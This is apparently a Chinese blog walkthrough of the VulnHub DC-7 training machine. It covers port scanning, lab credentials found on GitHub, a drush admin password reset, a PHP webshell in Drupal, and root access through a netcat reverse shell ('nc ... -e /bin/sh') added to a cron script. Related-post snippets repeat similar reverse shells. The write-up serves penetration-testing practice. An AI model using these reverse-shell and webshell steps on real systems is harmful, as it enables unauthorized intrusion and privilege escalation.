vulnhub靶机:dc-7

最新推荐文章于 2025-01-09 10:26:58 发布
原创 最新推荐文章于 2025-01-09 10:26:58 发布 · 428 阅读 · 7 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#linux

本文描述了一次渗透测试的过程,包括使用ARP扫描、端口扫描工具进行主机发现,通过SSH尝试登录,发现Drush命令漏洞并利用它修改了管理员密码,最终通过添加反弹shell在定时任务中实现提权。涉及的技术包括PHP、Drupal8和网络安全实践。

一:信息收集

1:主机发现

arp-scan -I eth0 10.9.23.0/24

靶机IP

10.9.23.157

2:端口扫描

nmap -A -p- -T4 10.9.23.157

3:端口探测

给的提示去搜索一下

@DC7USER

发现是github的一些代码,下载进行查看

在config.php配置文件里发现了用户名和密码

$username = "dc7user";

$password = "MdR3xOgB7#dW";

尝试右上角的登录界面

登陆失败

二:渗透测试

1:ssh登录

尝试ssh登录

ssh dc7user@10.9.23.157

在产看文件发现存在一个定时任务

cd /opt/scripts/

2:漏洞利用

发现能运行drush命令,drush命令可以更改密码,在/var/www/html目录下运行drush命令,更改admin的密码。

drush常用命令:

解释

$ drush cr 各种清缓存 $ drush pm-enable 安装module $ drush pm-uninstall 卸载module $ drush pm-list 显示所有modules and themes列表 $ drush user-password admin --password "123" 更改密码

cd /var/www/html

drush user-password admin --password="root"

然后用更改后的密码登录到系统中:

使用以下命令创建新用户:

drush user-create root --password "root"

drush user-password root --password="root"

新创建的用户没有东西,还是去admin

dc7的CMS是Drupal8,已经移除了PHP Filter(php过滤器),后续作为一个模组存在,可以手动安装。在官网找到下载链接,下载之后给 DC-7 安装

PHP | Drupal.org

在Content中添加一句话木马,依次点击:content(内容)→add content→basic page(为静态内容使用基本页面),测试添加,命名为ceshi。选择format为php code。

挂一句话木马()

使用蚁剑连接,反弹shell

三:提权

写入反弹shell、交互式shell然后提权,不过前面用drash命令时,发现是定时任务,可以再定时任务中添加用/bin/bash执行的nc命令,然后监听:

nc 10.9.23.112 6666 -e /bin/sh

定时任务需要等待一会

成功拿下

不言君
关注
Vulnhub靶机:DC-7渗透详细过程
IerkeU的博客
03-20 1272
DC-7 前言提要 这个靶机有用到社工~,还是蛮有趣的 靶场地址:https://www.vulnhub.com/entry/dc-7,356/ DC-7是一个中级的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具) 翻译一下官方给出的一些信息: 这个靶场需要具备中级的渗透测试技巧,这并不是一个很有技术性的挑战,但也不能算容易。渗透测试的和之前的 DC 靶机(哪一台就不知道了)有相似的地方,但会涉及到一些新东西,你的最终目标是放在roo
Vulnhub靶场----7DC-7
七天
02-24 2737
Vulnhub-DC 7
看完这篇 教你玩转渗透测试靶机vulnhub——DC7
Aluxian_的博客
04-01 6703
Vulnhub靶机DC6渗透测试详解Vulnhub靶机介绍:Vulnhub靶机下载:Vulnhub靶机安装:Vulnhub靶机漏洞详解:①:信息收集: Vulnhub靶机介绍: vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。 靶机DC7 还是老样子只有拿到root权限才可以发现最终的flag。 Vulnhub靶机下载: 官网地址:https://download.vulnhub.com/dc/D
Vulnhub系列--DC7
qq_33775686的博客
05-31 486
知识点: netdiscover nmap droopescan PHP Filter 反弹shell (bin shell 、MSF shell) 提权
Vulnhub靶机DC-7
过期的秋刀鱼
08-09 653
打开中国 蚁剑连接,蚁剑要想连接就得知道,刚上传的一句话木马所在的位置。目录下看看,发现是一个登录页面,这个时候没有密码,也不知道账户名。文件,发现里面内容重复的很多,是一封邮件,有一个可执行的脚本,同样的,把靶机跟kali放在同一网段,(NAT模式)一个以root权限定期执行的备份任务,执行文件。,就需要从其他方向找突破口了。目录里,发现都是看不懂的,搜了一下。后缀格式,发现是一种加密的文件格式。的权限,发现所有人都可以执行此文件。查看都有什么文件 ,使用命令。这么个关键词,发现有一个。
vulnhub靶机渗透DC-1
RestoreJustice的博客
03-17 677
​ 下载后用 VMware 或者 VirtualBox 打开,并配置好网卡,靶机与攻击机应置于同一网络下,靶机默认是桥接模式,能用攻击机连接到就行。这里提权我们可以考虑爆破22端口或者内核提权(绝招,实在没办法在考虑),但在此之前我们可以尝试找找是否有一些拥有suid标识的命令,利用其提权。使用nmap扫描主机服务、端口情况(-p-等价于-p 1-65535):nmap -p- -A 192.168.3.27。而且是几年前的,可以考虑使用MSF,上面应该集成了相关漏洞利用脚本,如果没有就得手工利用了。
VulnHub靶机 DC-7 打靶 渗透详细流程
网络空间安全学习
04-22 1542
主机发现—端口扫描—目录爆破发现后台—服务探测—白盒测试(源码当中找配置文件)—ssh远程登录—邮件信息—找到备份文件脚本—发现脚本当中的drush命令—修改后台密码—进入后台—寻找可代码执行或getshell地方—drupal8不允许执行命令(模块)—下载新的插件—getshell—反弹shell—追加反弹命令—提权即可。由于我们上一步骤已经得到了backups.sh脚本属主为root,属组为www-data,所以我们将反弹shell命令添加到脚本当中,等待执行脚本反弹shell即可得到root权限。
vulnhub靶机渗透DC-5
RestoreJustice的博客
03-17 311
前面收集信息,我们知道靶机使用nginx站点,nginx日志默认路径为/var/log/nginx/access.log。直接访问:http://192.168.80.134/%3C?反弹shell到kail中:nc -e /bin/bash/ 192.168.80.130 10086,然后利用python反弹,获得交互式shell,方便使用:python -c ‘import pty;这里连接到虚拟网卡1。下载地址:https://www.vulnhub.com/entry/dc-5,314/
Vulnhub靶机:DC-3渗透详细过程
IerkeU的博客
02-21 2716
前情提要 靶场地址:https://www.vulnhub.com/entry/dc-32,312/ DC-3是一个适合初学者的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具) 翻译一下官方给出的一些信息: 这个靶场与之前的不同,只有一个入口点和一个flag,并且没有任何线索。 靶场只需要简单的下载,解压,打开并将其导入到VMware即可(我将其网络配置为NAT模式,保证机器与kali在同一个网段下) nmap -sP 192.168.
Vulnhub靶机DC-1(suid find提权)
过期的秋刀鱼
08-03 684
Meterpreter shell作为渗透模块有很多有用的功能,比如添加一个用户、隐藏一些东西、打开shell、得到用户密码、上传下载远程主机的文件、运行cmd.exe、捕捉屏幕、得到远程控制权、捕获按键信息、清除应用程序、显示远程主机的系统信息、显示远程机器的网络接口和IP地址等信息。22、根据 flag4.txt 中的内容,推测下一步需要进行提权,从而获得 root 权限,并访问 /root 目录,获得 flag5。找到了与 http 相关的模块,根据 Rank(等级)优先选择带颜色的模块,使用。
vulnhub靶场【DC系列】之7
后台模板
01-09 959
DC-7,IP地址为kali,IP地址为都采用VMWare,网卡为桥接模式对于信息收集时,源码泄露能否会寻找,这里是通过一个作者名搜索到gihub的项目对于提权时,发现的东西都要去试一试,这里先测试exim4不行后,再下手脚本文件对于脚本文件的所属者和所属组要搞清楚,这里dc7user不属于www-data组,所以还需要获取www-data用户的反弹shell,那么就需要从网站下手对于drush和drupal是配合使用的,所以简单了解drush的增删改查即可drupal 8。
Vulnhub靶场】DC-7
good good study day day up
10-30 1467
DC-7靶场渗透测试过程,drush命令修改密码,反弹shell提权
Vulnhub-DC7学习笔记
weixin_42820274的博客
07-04 462
Vulnhub-DC7学习笔记
Vulnhub靶场DC-7
qq_34942239的博客
01-26 481
上面的脚本文件backups.sh是mbox的定时执行人任务,只要将反弹shell的指令写入到backups.sh,攻击机再开个监听端口,当定时任务执行的时候,我们就能拿到root权限。提示:DC7加了一些新的东西,让我看看盒子之外的东西,与DC系列前面几个靶机相比左下角多了个@DC7USER。注意到有个drush指令,drush是drupal里面的指令,可以修改一些配置文件。不过是以gpg结尾的,gpg加密文件,打开发现是一堆乱码,不知道怎么解密。目标192.168.223.136。
Vulnhub靶场实战---DC-7
一期一会的博客
01-18 3715
0x00 环境准备 1.靶场下载官网地址 https://www.vulnhub.com/entry/dc-7,356/ 2.下载完成以后直接导入vm,kali,靶机均使用均使用NAT模式连接, 攻击机:kali 192.168.88.130 靶机DC-7 192.168.88.133 0x01 信息收集 1.探测88网段主机,使用nmap扫描。 -sn Ping探测扫描主机,不进行端口扫描(测试过对方主机把icmp包都丢弃掉,依然能检测到对方开机状态) -sp 进行Ping扫描 -sA
Vulnhub靶场 | DC系列 - DC7
哦 卷!
08-31 1029
对于当前的dc7user用户来说没有写权限,如果想再该脚本中写入代码,需要是root用户或者属于www-data组。靶机的信息告诉我们跳出思维惯性,页面的最先面有一个@DC7USER,既然是@开头,大概率是某个账号信息。其中 drush 命令,是为了管理drupal网站的工具。发现robots.txt文件,这也是web中的比较重要的敏感文件。看一下自己的sudo授权,提示没有该命令,但是有个新邮件。有上传图片的位置,尝试下图片马,很不幸失败了~直接将马写在文章中,不行,直接原样输出了。
vulnhub靶场之DC-7
qq_58091216的博客
01-13 1199
发现Content里面可以编辑文章,依次点击Manage ——> Content ——> Add content ——> Basic page功能,尝试添加php一句话,但发现Drupal 8后为了安全需要将php单独作为一个模块导入;但是如果我们获得了www-data的shell 那就可以写点东西进去,然后依靠计划任务,用root去运行,那么我们可以获得了root权限的shell了。查看下权限什么的,发现www-data拥有执行和写的权限,我们当前权限没有写权限,看来没办法动手脚了。
VulnHub DC7
baynk的博客
05-21 528
0x00 靶机环境 下载地址1:https://www.vulnhub.com/entry/dc-7,356/ 下载地址2:https://pan.baidu.com/s/1xua7BTO8If5zLua8dQMryA 提取码: dd83 只有一个flag,同时给了提示,不要去使用暴力破解。 这次地址都给了,真好,开肝。 0x02 渗透流程 nmap走起 还是先走80端口 熟悉的界面,好像是dc1使用的Drupal CMS,翻出第一关的页面进行对比 常规思路测试了好一会不一样的地方,逻辑漏洞,搜
vulnhub DC7 靶场练习
鸥鹭忘机
08-20 1867
前言 这次练习的靶机vulnhub平台下的DC系列靶机7台,下载地址为https://www.vulnhub.com/entry/dc-7,356/。挑战该靶机的最终目的是获取root权限,然后读取唯一的flag。这台靶机中用暴力破解成功的概率非常小,我们需要开阔思路,寻找非技术上的方法。 虚拟机配置 这次采用的网络连接模式依然是NAT模式,为了避免扫描到其他物理主机。在导入虚拟机后,右击DC-6靶机,然后选中配置。依次点击网络配置->NAT模式->高级->生成,然后确认即可。 收集
vulnhub靶机dc-1
最新发布
01-11
### VulnHub DC-1 靶机 攻略 介绍 下载 #### 关于DC-1靶机 VulnHub上的DC-1靶机旨在提供给安全爱好者和渗透测试学习者一个实践平台,在此环境中可以合法地进行各种攻击尝试,从而提升技能。该虚拟环境模拟了一个...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值